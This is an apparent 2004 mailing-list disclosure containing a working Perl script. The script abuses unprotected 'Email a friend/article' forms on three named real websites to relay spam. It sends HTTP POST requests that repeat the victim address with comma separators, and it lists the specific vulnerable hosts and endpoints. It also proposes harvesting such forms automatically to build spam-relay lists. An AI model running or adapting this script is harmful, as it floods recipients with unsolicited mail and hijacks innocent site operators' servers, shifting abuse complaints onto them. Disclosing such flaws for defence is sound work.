<<< Date Index >>>     <<< Thread Index >>>

Spammers can hide behind 'Email a friend/article' scripts.




# Author:      Vengy
# Email:       cyber_flash@xxxxxxxxxxx
# Description: Spammers can hide behind 'Email a friend/article' scripts.
#
#
# How it works:
# -------------
# This simple perl script will send just 3 identical fake spam messages
# to 'yourname@xxxxxxxxxxxxxx' from 'vengy@xxxxxxxxxx'. Example:
#
# +------------------------------------------+
# | From :     <vengy@xxxxxxxxxx>            |
# | Sent :     Friday, April 9, 2004 6:34 PM |
# | To :       <yourname@xxxxxxxxxxxxxx>     |
# | Subject :  To spam or not to spam!       |
# |                                          |
# | Urgent! Call me: 1-900-EAT-SPAM          |
# |                                          |
# | www.spammmmmm.com                        |
# +------------------------------------------+
#
# If a spammer or victim sends junk email directly to their ISP SMTP servers,
# network Admins can trace back the connection and deal with the problem.
# 
# But, the 'Email a friend' technique will deflect a significant portion of
# the complaints away from spammers and towards the administrators of the 
hijacked host.
#
# There are possibly zillions of insecure 'Email a friend/article' on the web! 
(just google it)
# Many allow multiple unrestricted emails to be sent separated by comma's.
# (Imagine an automated harvester to compile a list of open spam servers!)
#
# For demonstrational purposes, here are two random servers:
# 
#
# Host:                       Outgoing SMTP Server:   Email Originator:
# =====                       =====================   =================
# www.wcqp.com                relay.westlaw.com       eg-fsite-b12.ecom.tlrg.com
# edinburghnews.scotsman.com  macdui.scotsman.com     80-75-65-10.eqsn.net
#
#
# Notes: Relaying is denied (550) when connecting directly to the SMTP servers.
# However, by using email forms, the Originator has access to send messages!
#
#
# Arguments to Send_SPAM are:
# ---------------------------
# 1. Webserver.
# 2. Email script.
# 3. Host.
# 4. Content.
# 5. Email address of Victim.
# 6. Number of copies to send.


use IO::Socket::INET qw(CRLF);


my $victim       = 'yourname@xxxxxxxxxxxxxx';
my $copies       = 3;
my $sender_email = 'vengy@xxxxxxxxxx';
my $sender_name  = 'vengy';
my $subject      = 'To+spam+or+not+to+spam%21';
my $body         = 'Urgent!+Call+me:+1-900-EAT-SPAM';
my $spam_url     = 'http%3A%2F%2Fwww.spammmmmm.com'; 


################## Spam Server #1 ##################
Send_SPAM('www.wcqp.com',
          'FSL5CS/Custom/emailPageConfirm.asp',
          'www.wcqp.com',
          'friend_name='.("%2C" x 
($copies-1)).'&friend_email='.$victim.'&your_name='.$sender_name.'&your_email='.$sender_email.'&subject='.$subject.'&comments='.$body.'&url='.$spam_url,
           $victim,
           $copies);
          
################## Spam Server #2 ##################          
Send_SPAM('216.55.105.36.hera.net',
          'recommend.php/en/',
          'toolbox.academicpriority.co.il',
          
'recommend='.$spam_url.'&friendsemail='.$victim.'&youremail='.$sender_email.'&yourname='.$sender_name,
        
          $victim,
          1);          


################## Spam Server #3 ##################
Send_SPAM('www.scotsman.com',
          'email2.cfm',
          'edinburghnews.scotsman.com',          
          
'id=364942004&referringtemplate='.$spam_url.'&referringquerystring=id%3D&recipientemail='.$victim.'&sendername='.$sender_name.'&senderemail='.$sender_email.'&subject='.$subject.'&message='.$body,
          $victim,
          $copies);
          

sub Send_SPAM {
    my ($server,$url,$host,$content,$email_to,$email_num) = @_;
      
    $repeat_email_to = ($email_to."%2C") x $email_num;
    substr($repeat_email_to,-3,3) = "";
    $content =~ s/$email_to/$repeat_email_to/;
    
    $sock = IO::Socket::INET->new(PeerAddr => $server ,PeerPort => 
'http(80)',Proto => 'tcp');
    die "$!" unless $sock;
    $sock->autoflush();
    
    print $sock 'POST /'.$url.' HTTP/1.1',CRLF,
                'Host: '.$host,CRLF,
                'Content-Type: application/x-www-form-urlencoded',CRLF,
                'Content-Length: '.length($content),CRLF,
                'Connection: Keep-Alive',CRLF,
                'Cache-Control: no-cache',CRLF  x 2,
                $content;
                
    close $sock;
    
    print "Sent SPAM from server: $server\n";
}